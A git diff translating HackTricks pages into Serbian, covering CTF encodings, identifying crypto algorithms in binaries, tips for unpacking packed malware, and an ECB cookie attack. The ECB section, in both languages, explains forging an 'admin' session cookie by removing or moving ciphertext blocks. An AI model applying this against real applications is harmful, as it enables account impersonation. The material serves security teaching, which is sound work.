 5Hol-G2xAEE++
 end
 ```
-
 - [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
 
 ### YEncoder
-
 ```
 =ybegin line=128 size=28 name=webutils_pl
 ryvkryvkryvkryvkryvkryvkryvk
 =yend size=28 crc32=35834c86
 ```
-
 - [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
 
 ### BinHex
-
 ```
 (This file must be converted with BinHex 4.0)
 :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
 -38K26%'d9J!!:
 ```
-
 - [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
 
 ### ASCII85
-
 ```
 <~85DoF85DoF85DoF85DoF85DoF85DoF~>
 ```
-
 - [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
 
-### Dvorak keyboard
-
+### Dvorak tastatura
 ```
 drnajapajrna
 ```
-
 - [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard)
 
 ### A1Z26
 
-Letters to their numerical value
-
+Slova do njihove numeričke vrednosti
 ```
 8 15 12 1 3 1 18 1 3 15 12 1
 ```
-
 ### Affine Cipher Encode
 
-Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
-
+Pismo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je pismo) i rezultat nazad u pismo
 ```
 krodfdudfrod
 ```
+### SMS Kod
 
-### SMS Code
+**Multitap** [menja slovo](https://www.dcode.fr/word-letter-change) ponovljenim ciframa definisanim odgovarajućim kodom tastera na mobilnom [tastaturi telefona](https://www.dcode.fr/phone-keypad-cipher) (Ovaj način se koristi prilikom pisanja SMS-a).\
+Na primer: 2=A, 22=B, 222=C, 3=D...\
+Možete identifikovati ovaj kod jer ćete videti\*\* nekoliko ponovljenih brojeva\*\*.
 
-**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
-For example: 2=A, 22=B, 222=C, 3=D...\
-You can identify this code because you will see\*\* several numbers repeated\*\*.
+Možete dekodirati ovaj kod na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
 
-You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
-
-### Bacon Code
-
-Substitude each letter for 4 As or Bs (or 1s and 0s)
+### Bacon Kod
 
+Zamenite svako slovo sa 4 A ili B (ili 1 i 0)
 ```
 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
 ```
-
 ### Runes
 
 ![](../images/runes.jpg)
 
-## Compression
+## Kompresija
 
-**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
+**Raw Deflate** i **Raw Inflate** (možete ih pronaći u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja.
 
-## Easy Crypto
+## Laka Kriptografija
 
 ### XOR - Autosolver
 
@@ -241,30 +217,25 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
 
 ### Bifid
 
-A keywork is needed
-
+Potrebna je ključna reč
 ```
 fgaargaamnlunesuneoa
 ```
-
 ### Vigenere
 
-A keywork is needed
-
+Potreban je ključ.
 ```
 wodsyoidrods
 ```
-
 - [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
 - [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
 - [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
 
-## Strong Crypto
+## Snažna Kriptografija
 
 ### Fernet
 
-2 base64 strings (token and key)
-
+2 base64 stringa (token i ključ)
 ```
 Token:
 gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
@@ -272,19 +243,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC
 Key:
 -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
 ```
-
 - [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
 
 ### Samir Secret Sharing
 
-A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
-
+Tajna se deli na X delova i da biste je povratili, potrebna su vam Y dela (_Y <=X_).
 ```
 8019f8fa5879aa3e07858d08308dc1a8b45
 80223035713295bddf0b0bd1b10a5340b89
 803bc8cf294b3f83d88e86d9818792e80cd
 ```
-
 [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
 
 ### OpenSSL brute-force
@@ -292,7 +260,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
 - [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
 - [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
 
-## Tools
+## Alati
 
 - [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
 - [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
diff --git a/src/crypto-and-stego/cryptographic-algorithms/README.md b/src/crypto-and-stego/cryptographic-algorithms/README.md
index bcfcf1d0a..f53e97661 100644
--- a/src/crypto-and-stego/cryptographic-algorithms/README.md
+++ b/src/crypto-and-stego/cryptographic-algorithms/README.md
@@ -1,184 +1,184 @@
-# Cryptographic/Compression Algorithms
+# Kriptografski/Kompresioni Algoritmi
 
-## Cryptographic/Compression Algorithms
+## Kriptografski/Kompresioni Algoritmi
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Identifying Algorithms
+## Identifikacija Algoritama
 
-If you ends in a code **using shift rights and lefts, xors and several arithmetic operations** it's highly possible that it's the implementation of a **cryptographic algorithm**. Here it's going to be showed some ways to **identify the algorithm that it's used without needing to reverse each step**.
+Ako završite u kodu **koristeći pomeranja udesno i ulevo, XOR-ove i nekoliko aritmetičkih operacija**, veoma je verovatno da je to implementacija **kriptografskog algoritma**. Ovde će biti prikazani neki načini da se **identifikuje algoritam koji se koristi bez potrebe da se obrne svaki korak**.
 
-### API functions
+### API funkcije
 
 **CryptDeriveKey**
 
-If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
+Ako se ova funkcija koristi, možete saznati koji se **algoritam koristi** proverom vrednosti drugog parametra:
 
 ![](<../../images/image (156).png>)
 
-Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+Proverite ovde tabelu mogućih algoritama i njihovih dodeljenih vrednosti: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
 **RtlCompressBuffer/RtlDecompressBuffer**
 
-Compresses and decompresses a given buffer of data.
+Kompresuje i dekompresuje dati bafer podataka.
 
 **CryptAcquireContext**
 
-From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP.
+Iz [dokumentacije](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): Funkcija **CryptAcquireContext** se koristi za sticanje rukohvata za određeni kontejner ključeva unutar određenog kriptografskog servisnog provajdera (CSP). **Ovaj vraćeni rukohvat se koristi u pozivima funkcija CryptoAPI** koje koriste odabrani CSP.
 
 **CryptCreateHash**
 
-Initiates the hashing of a stream of data. If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
+Inicira heširanje toka podataka. Ako se ova funkcija koristi, možete saznati koji se **algoritam koristi** proverom vrednosti drugog parametra:
 
 ![](<../../images/image (549).png>)
 
 \
-Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+Proverite ovde tabelu mogućih algoritama i njihovih dodeljenih vrednosti: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
-### Code constants
+### Konstantne u kodu
 
-Sometimes it's really easy to identify an algorithm thanks to the fact that it needs to use a special and unique value.
+Ponekad je zaista lako identifikovati algoritam zahvaljujući činjenici da mora koristiti posebnu i jedinstvenu vrednost.
 
 ![](<../../images/image (833).png>)
 
-If you search for the first constant in Google this is what you get:
+Ako pretražujete prvu konstantu na Google-u, ovo je ono što dobijate:
 
 ![](<../../images/image (529).png>)
 
-Therefore, you can assume that the decompiled function is a **sha256 calculator.**\
-You can search any of the other constants and you will obtain (probably) the same result.
+Stoga, možete pretpostaviti da je dekompilovana funkcija **sha256 kalkulator.**\
+Možete pretražiti bilo koju od drugih konstanti i dobićete (verovatno) isti rezultat.
 
-### data info
+### informacija o podacima
 
-If the code doesn't have any significant constant it may be **loading information from the .data section**.\
-You can access that data, **group the first dword** and search for it in google as we have done in the section before:
+Ako kod nema nijednu značajnu konstantu, može biti da **učitava informacije iz .data sekcije**.\
+Možete pristupiti tim podacima, **grupisati prvi dword** i pretražiti ga na Google-u kao što smo uradili u prethodnoj sekciji:
 
 ![](<../../images/image (531).png>)
 
-In this case, if you look for **0xA56363C6** you can find that it's related to the **tables of the AES algorithm**.
+U ovom slučaju, ako tražite **0xA56363C6**, možete pronaći da je povezan sa **tabelama AES algoritma**.
 
-## RC4 **(Symmetric Crypt)**
+## RC4 **(Simetrična Kriptografija)**
 
-### Characteristics
+### Karakteristike
 
-It's composed of 3 main parts:
+Sastoji se od 3 glavne komponente:
 
-- **Initialization stage/**: Creates a **table of values from 0x00 to 0xFF** (256bytes in total, 0x100). This table is commonly call **Substitution Box** (or SBox).
-- **Scrambling stage**: Will **loop through the table** crated before (loop of 0x100 iterations, again) creating modifying each value with **semi-random** bytes. In order to create this semi-random bytes, the RC4 **key is used**. RC4 **keys** can be **between 1 and 256 bytes in length**, however it is usually recommended that it is above 5 bytes. Commonly, RC4 keys are 16 bytes in length.
-- **XOR stage**: Finally, the plain-text or cyphertext is **XORed with the values created before**. The function to encrypt and decrypt is the same. For this, a **loop through the created 256 bytes** will be performed as many times as necessary. This is usually recognized in a decompiled code with a **%256 (mod 256)**.
+- **Faza inicijalizacije/**: Kreira **tabelu vrednosti od 0x00 do 0xFF** (ukupno 256 bajtova, 0x100). Ova tabela se obično naziva **Substituciona Kutija** (ili SBox).
+- **Faza premeštanja**: **Prolazi kroz tabelu** kreiranu ranije (petlja od 0x100 iteracija, ponovo) modifikujući svaku vrednost sa **polu-nasumičnim** bajtovima. Da bi se kreirali ovi polu-nasumični bajtovi, koristi se RC4 **ključ**. RC4 **ključevi** mogu biti **između 1 i 256 bajtova dužine**, međutim obično se preporučuje da budu iznad 5 bajtova. Obično, RC4 ključevi su 16 bajtova dužine.
+- **XOR faza**: Na kraju, običan tekst ili šifrovani tekst se **XOR-uje sa vrednostima kreiranim ranije**. Funkcija za enkripciju i dekripciju je ista. Za ovo, **proći će se kroz kreiranih 256 bajtova** onoliko puta koliko je potrebno. Ovo se obično prepoznaje u dekompilovanom kodu sa **%256 (mod 256)**.
 
 > [!NOTE]
-> **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)**
+> **Da biste identifikovali RC4 u disasembleru/dekompilovanom kodu, možete proveriti 2 petlje veličine 0x100 (uz korišćenje ključa) i zatim XOR ulaznih podataka sa 256 vrednosti kreiranih ranije u 2 petlje, verovatno koristeći %256 (mod 256)**
 
-### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars)
+### **Faza inicijalizacije/Substituciona Kutija:** (Obratite pažnju na broj 256 korišćen kao brojač i kako se 0 piše na svakom mestu od 256 karaktera)
 
 ![](<../../images/image (584).png>)
 
-### **Scrambling Stage:**
+### **Faza premeštanja:**
 
 ![](<../../images/image (835).png>)
 
-### **XOR Stage:**
+### **XOR Faza:**
 
 ![](<../../images/image (904).png>)
 
-## **AES (Symmetric Crypt)**
+## **AES (Simetrična Kriptografija)**
 
-### **Characteristics**
+### **Karakteristike**
 
-- Use of **substitution boxes and lookup tables**
-  - It's possible to **distinguish AES thanks to the use of specific lookup table values** (constants). _Note that the **constant** can be **stored** in the binary **or created**_ _**dynamically**._
-- The **encryption key** must be **divisible** by **16** (usually 32B) and usually an **IV** of 16B is used.
+- Korišćenje **substitucionih kutija i tabela za pretragu**
+- Moguće je **razlikovati AES zahvaljujući korišćenju specifičnih vrednosti tabela za pretragu** (konstanti). _Napomena da se **konstant** može **čuvati** u binarnom **ili kreirati** _**dinamički**._
+- **Ključ za enkripciju** mora biti **deljiv** sa **16** (obično 32B) i obično se koristi **IV** od 16B.
 
-### SBox constants
+### SBox konstante
 
 ![](<../../images/image (208).png>)
 
-## Serpent **(Symmetric Crypt)**
+## Serpent **(Simetrična Kriptografija)**
 
-### Characteristics
+### Karakteristike
 
-- It's rare to find some malware using it but there are examples (Ursnif)
-- Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function)
+- Retko se nalazi neki malware koji ga koristi, ali postoje primeri (Ursnif)
+- Lako je odrediti da li je algoritam Serpent ili ne na osnovu njegove dužine (ekstremno duga funkcija)
 
-### Identifying
+### Identifikacija
 
-In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\
-Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example:
+Na sledećoj slici obratite pažnju na to kako se konstanta **0x9E3779B9** koristi (napomena da se ova konstanta takođe koristi i od drugih kripto algoritama kao što je **TEA** -Tiny Encryption Algorithm).\
+Takođe obratite pažnju na **veličinu petlje** (**132**) i **broj XOR operacija** u **disasembleru** i u **primeru koda**:
 
 ![](<../../images/image (547).png>)
 
-As it was mentioned before, this code can be visualized inside any decompiler as a **very long function** as there **aren't jumps** inside of it. The decompiled code can look like the following:
+Kao što je ranije pomenuto, ovaj kod može biti vizualizovan unutar bilo kog dekompilatora kao **veoma duga funkcija** jer **nema skakanja** unutar nje. Dekomplovani kod može izgledati ovako:
 
 ![](<../../images/image (513).png>)
 
-Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
+Stoga, moguće je identifikovati ovaj algoritam proverom **magične brojke** i **početnih XOR-ova**, videći **veoma dugu funkciju** i **upoređujući** neke **instrukcije** duge funkcije **sa implementacijom** (kao što su pomeranje ulevo za 7 i rotacija ulevo za 22).
 
-## RSA **(Asymmetric Crypt)**
+## RSA **(Asimetrična Kriptografija)**
 
-### Characteristics
+### Karakteristike
 
-- More complex than symmetric algorithms
-- There are no constants! (custom implementation are difficult to determine)
-- KANAL (a crypto analyzer) fails to show hints on RSA ad it relies on constants.
+- Složeniji od simetričnih algoritama
+- Nema konstanti! (prilagođene implementacije su teške za određivanje)
+- KANAL (analizator kriptografije) ne uspeva da pokaže naznake o RSA jer se oslanja na konstante.
 
-### Identifying by comparisons
+### Identifikacija poređenjem
 
 ![](<../../images/image (1113).png>)
 
-- In line 11 (left) there is a `+7) >> 3` which is the same as in line 35 (right): `+7) / 8`
-- Line 12 (left) is checking if `modulus_len < 0x040` and in line 36 (right) it's checking if `inputLen+11 > modulusLen`
+- U liniji 11 (levo) postoji `+7) >> 3` što je isto kao u liniji 35 (desno): `+7) / 8`
+- Linija 12 (levo) proverava da li je `modulus_len < 0x040` a u liniji 36 (desno) proverava da li je `inputLen+11 > modulusLen`
 
-## MD5 & SHA (hash)
+## MD5 & SHA (heš)
 
-### Characteristics
+### Karakteristike
 
-- 3 functions: Init, Update, Final
-- Similar initialize functions
+- 3 funkcije: Init, Update, Final
+- Slične inicijalizacione funkcije
 
-### Identify
+### Identifikacija
 
 **Init**
 
-You can identify both of them checking the constants. Note that the sha_init has 1 constant that MD5 doesn't have:
+Možete identifikovati oboje proverom konstanti. Napomena da sha_init ima 1 konstantu koju MD5 nema:
 
 ![](<../../images/image (406).png>)
 
-**MD5 Transform**
+**MD5 Transformacija**
 
-Note the use of more constants
+Obratite pažnju na korišćenje više konstanti
 
 ![](<../../images/image (253) (1) (1).png>)
 
-## CRC (hash)
+## CRC (heš)
 
-- Smaller and more efficient as it's function is to find accidental changes in data
-- Uses lookup tables (so you can identify constants)
+- Manji i efikasniji jer je njegova funkcija da pronađe slučajne promene u podacima
+- Koristi tabele za pretragu (tako da možete identifikovati konstante)
 
-### Identify
+### Identifikacija
 
-Check **lookup table constants**:
+Proverite **konstante tabela za pretragu**:
 
 ![](<../../images/image (508).png>)
 
-A CRC hash algorithm looks like:
+CRC heš algoritam izgleda ovako:
 
 ![](<../../images/image (391).png>)
 
-## APLib (Compression)
+## APLib (Kompresija)
 
-### Characteristics
+### Karakteristike
 
-- Not recognizable constants
-- You can try to write the algorithm in python and search for similar things online
+- Nema prepoznatljivih konstanti
+- Možete pokušati da napišete algoritam u Python-u i pretražite slične stvari na mreži
 
-### Identify
+### Identifikacija
 
-The graph is quiet large:
+Grafik je prilično veliki:
 
 ![](<../../images/image (207) (2) (1).png>)
 
-Check **3 comparisons to recognise it**:
+Proverite **3 poređenja da biste ga prepoznali**:
 
 ![](<../../images/image (430).png>)
 
diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md
index 6699ec26f..97f14e0bd 100644
--- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md
+++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md
@@ -1,24 +1,24 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Identifying packed binaries
+# Identifikacija pakovanih binarnih datoteka
 
-- **lack of strings**: It's common to find that packed binaries doesn't have almost any string
-- A lot of **unused strings**: Also, when a malware is using some kind of commercial packer it's common to find a lot of strings without cross-references. Even if these strings exist that doesn't mean that the binary isn't packed.
-- You can also use some tools to try to find which packer was used to pack a binary:
-  - [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml)
-  - [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml)
-  - [Language 2000](http://farrokhi.net/language/)
+- **nedostatak stringova**: Uobičajeno je da pakovane binarne datoteke nemaju gotovo nikakve stringove
+- Puno **neiskorišćenih stringova**: Takođe, kada malware koristi neku vrstu komercijalnog pakera, uobičajeno je pronaći puno stringova bez međureferenci. Čak i ako ovi stringovi postoje, to ne znači da binarna datoteka nije pakovana.
+- Takođe možete koristiti neke alate da pokušate da otkrijete koji je pakera korišćen za pakovanje binarne datoteke:
+- [PEiD](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml)
+- [Exeinfo PE](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/ExEinfo-PE.shtml)
+- [Language 2000](http://farrokhi.net/language/)
 
-# Basic Recommendations
+# Osnovne preporuke
 
-- **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start.
-- Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it.
-- Put a **breakpoint** on `VirtualAlloc` as this allocates space in memory where the program can write unpacked code. The "run to user code" or use F8 to **get to value inside EAX** after executing the function and "**follow that address in dump**". You never know if that is the region where the unpacked code is going to be saved.
-  - **`VirtualAlloc`** with the value "**40**" as an argument means Read+Write+Execute (some code that needs execution is going to be copied here).
-- **While unpacking** code it's normal to find **several calls** to **arithmetic operations** and functions like **`memcopy`** or **`Virtual`**`Alloc`. If you find yourself in a function that apparently only perform arithmetic operations and maybe some `memcopy` , the recommendation is to try to **find the end of the function** (maybe a JMP or call to some register) **or** at least the **call to the last function** and run to then as the code isn't interesting.
-- While unpacking code **note** whenever you **change memory region** as a memory region change may indicate the **starting of the unpacking code**. You can easily dump a memory region using Process Hacker (process --> properties --> memory).
-- While trying to unpack code a good way to **know if you are already working with the unpacked code** (so you can just dump it) is to **check the strings of the binary**. If at some point you perform a jump (maybe changing the memory region) and you notice that **a lot more strings where added**, then you can know **you are working with the unpacked code**.\
-  However, if the packer already contains a lot of strings you can see how many strings contains the word "http" and see if this number increases.
-- When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases).
+- **Počnite** analizu pakovane binarne datoteke **od dna u IDA-i i pomerajte se ka vrhu**. Alati za dekompresiju izlaze kada dekompresovani kod završi, tako da je malo verovatno da će dekompresor preneti izvršenje na dekompresovani kod na početku.
+- Pretražujte za **JMP-ovima** ili **CALL-ovima** ka **registrima** ili **regionima** **memorije**. Takođe pretražujte za **funkcijama koje prosleđuju argumente i adresu, a zatim pozivaju `retn`**, jer povratak funkcije u tom slučaju može pozvati adresu koja je upravo prosleđena na stek pre nego što je pozvana.
+- Postavite **prekidač** na `VirtualAlloc` jer ovo alocira prostor u memoriji gde program može pisati dekompresovani kod. "Pokreni do korisničkog koda" ili koristite F8 da **dobijete vrednost unutar EAX** nakon izvršavanja funkcije i "**pratite tu adresu u dump-u**". Nikada ne znate da li je to region gde će dekompresovani kod biti sačuvan.
+- **`VirtualAlloc`** sa vrednošću "**40**" kao argument znači Čitanje+Pisanje+Izvršavanje (neki kod koji treba da se izvrši će biti kopiran ovde).
+- **Tokom dekompresije** koda normalno je pronaći **several calls** ka **aritmetičkim operacijama** i funkcijama kao što su **`memcopy`** ili **`Virtual`**`Alloc`. Ako se nađete u funkciji koja očigledno samo vrši aritmetičke operacije i možda neki `memcopy`, preporuka je da pokušate da **pronađete kraj funkcije** (možda JMP ili poziv nekog registra) **ili** barem **poziv poslednje funkcije** i pokrenete do tada jer kod nije zanimljiv.
+- Tokom dekompresije koda **napomena** kada god **promenite region memorije** jer promena regiona memorije može ukazivati na **početak dekompresionog koda**. Možete lako dump-ovati region memorije koristeći Process Hacker (process --> properties --> memory).
+- Dok pokušavate da dekompresujete kod, dobar način da **znate da li već radite sa dekompresovanim kodom** (tako da ga možete samo dump-ovati) je da **proverite stringove binarne datoteke**. Ako u nekom trenutku izvršite skok (možda menjajući region memorije) i primetite da su **dodati mnogi više stringova**, tada možete znati **da radite sa dekompresovanim kodom**.\
+Međutim, ako pakera već sadrži puno stringova, možete videti koliko stringova sadrži reč "http" i proveriti da li se ovaj broj povećava.
+- Kada dump-ujete izvršnu datoteku iz regiona memorije, možete ispraviti neke zaglavlja koristeći [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases).
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md
index a09798b1e..93d94991b 100644
--- a/src/crypto-and-stego/electronic-code-book-ecb.md
+++ b/src/crypto-and-stego/electronic-code-book-ecb.md
@@ -2,72 +2,66 @@
 
 # ECB
 
-(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
+(ECB) Elektronska knjiga kodova - simetrična šema enkripcije koja **menja svaki blok otvorenog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema enkripcije. Glavna ideja je da se **podeli** otvoreni tekst na **blokove od N bita** (zavisi od veličine bloka ulaznih podataka, algoritma enkripcije) i zatim da se enkriptuje (dekriptuje) svaki blok otvorenog teksta koristeći jedini ključ.
 
 ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
 
-Using ECB has multiple security implications:
+Korišćenje ECB ima više bezbednosnih implikacija:
 
-- **Blocks from encrypted message can be removed**
-- **Blocks from encrypted message can be moved around**
+- **Blokovi iz šifrovane poruke mogu biti uklonjeni**
+- **Blokovi iz šifrovane poruke mogu biti pomerani**
 
-# Detection of the vulnerability
+# Otkrivanje ranjivosti
 
-Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\
-Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
-You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**.
-
-Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`**
+Zamislite da se prijavljujete u aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\
+Zatim, generišete nove korisnike, oboje sa **istim dugim lozinkama** i **gotovo** **istim** **korisničkim imenima**.\
+Otkrivate da su **blokovi od 8B** gde su **informacije obojice korisnika** iste **jednaki**. Tada zamišljate da bi to moglo biti zato što se **koristi ECB**.
 
+Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`**.
 ```
 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
 
 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
 ```
+Ovo je zato što su **korisničko ime i lozinka tih kolačića sadržavali nekoliko puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji su sadržavali **barem 1 različit karakter** (možda delimiter "|" ili neka neophodna razlika u korisničkom imenu).
 
-This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username).
+Sada, napadaču je potrebno samo da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne pronađe format i dužinu delimitera:**
 
-Now, the attacker just need to discover if the format is `` or ``. For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:**
+| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+lozinke: | Dužina kolačića (nakon dekodiranja): |
+| -------------------------- | ---------------- | --------------------------------- | ------------------------------------- |
+| 2                          | 2                | 4                                 | 8                                   |
+| 3                          | 3                | 6                                 | 8                                   |
+| 3                          | 4                | 7                                 | 8                                   |
+| 4                          | 4                | 8                                 | 16                                  |
+| 7                          | 7                | 14                                | 16                                  |
 
-| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): |
-| ---------------- | ---------------- | ------------------------- | --------------------------------- |
-| 2                | 2                | 4                         | 8                                 |
-| 3                | 3                | 6                         | 8                                 |
-| 3                | 4                | 7                         | 8                                 |
-| 4                | 4                | 8                         | 16                                |
-| 7                | 7                | 14                        | 16                                |
+# Iskorišćavanje ranjivosti
 
-# Exploitation of the vulnerability
-
-## Removing entire blocks
-
-Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
+## Uklanjanje celih blokova
 
+Znajući format kolačića (`|`), kako bi se predstavilo korisničko ime `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić i dekodirajte ga:
 ```
 \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
 ```
-
-We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\
-Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`:
-
+Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` koji je prethodno kreiran sa korisničkim imenom koje je sadržalo samo `a`.\
+Zatim, možete ukloniti prvi blok od 8B i dobićete važeći kolačić za korisničko ime `admin`:
 ```
 \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
 ```
+## Premještanje blokova
 
-## Moving blocks
+U mnogim bazama podataka je isto pretraživati `WHERE username='admin';` ili `WHERE username='admin    ';` _(Obratite pažnju na dodatne razmake)_
 
-In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin    ';` _(Note the extra spaces)_
+Dakle, drugi način da se lažno predstavi korisnik `admin` bio bi:
 
-So, another way to impersonate the user `admin` would be to:
+- Generisati korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B.
